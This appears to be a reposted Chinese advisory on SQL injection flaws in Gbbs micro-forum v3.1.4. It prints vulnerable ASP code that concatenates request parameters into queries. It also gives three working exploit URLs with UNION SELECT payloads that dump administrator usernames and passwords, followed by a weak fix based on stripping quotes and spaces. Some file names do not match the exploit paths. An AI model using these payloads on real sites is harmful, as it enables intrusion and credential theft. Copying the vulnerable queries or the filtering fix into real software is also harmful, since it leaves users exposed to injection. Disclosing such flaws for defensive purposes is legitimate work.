Gbbs微论坛 v3.1.4注入漏洞漏洞预警 -电脑资料

时间:2017-09-02 04:35:26
染雾
分享
WORD下载 PDF下载 投诉

官方地址:http://www.softatm.com

漏洞证明:/css/ss.txt

程序下载:http://down.chinaz.com/soft/33484.htm

漏洞文件 /userinfo.asp 72行到74行

漏洞类型:字符型注入

漏洞信息:

<%yhm = request("yhm")

set rs=server.createobject("adodb.recordset")

exec="select * from yrwl_tb_admin where yhm='"+yhm+"'"

原因:没有过滤注入语句,直接执行查询

危害:sql注入漏洞,直接爆出用户账号密码,

Gbbs微论坛 v3.1.4注入漏洞漏洞预警

exp:/userinfo.asp?yhm='%20union%20select%201,2,3,yhm%2bchr(35)%2bpass,5,6,7,8,9,10,11,12,13,14,15%20from%20yrwl_tb_admin

----------------------------------------------------------------

漏洞文件 /userinfo.asp 2行到7行

漏洞类型:字符型注入

漏洞信息:

mc = request("ad")

if mc <> "" then

set rs=server.createobject("adodb.recordset")

''定位

sql="select * from yrwl_ad_dhl where cl='1' and mc='" + mc & "'"

原因:没有过滤注入语句,直接执行查询

危害:sql注入漏洞,直接爆出用户账号密码,

电脑资料

《Gbbs微论坛 v3.1.4注入漏洞漏洞预警》()。

exp:/ad.asp?ad='%20union%20select%201,2,3,4,5,6,7,8,yhm%2bchr(35)%2bpass%20from%20yrwl_tb_admin

----------------------------------------------------------------

漏洞文件 /userinfo.asp 32行,52行

漏洞类型:整数型注入

漏洞信息:

id = req

uest("id")

...

exec="select * from yrwl_tb_lt where id="+id

原因:没有过滤注入语句,直接执行查询

危害:sql注入漏洞,直接爆出用户账号密码。

exp:/bbs_bj.asp?id=11%20and%201=2%20union%20select%201,yhm%2bchr(35)%2bpass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20yrwl_tb_admin

----------------------------------------------------------------

修复方法,整数型过滤字符CInt() 字符型过滤空格和'Replace(str,"'","")Replace(str,"%20","")

Gbbs微论坛 v3.1.4注入漏洞漏洞预警 -电脑资料

手机扫码分享

Top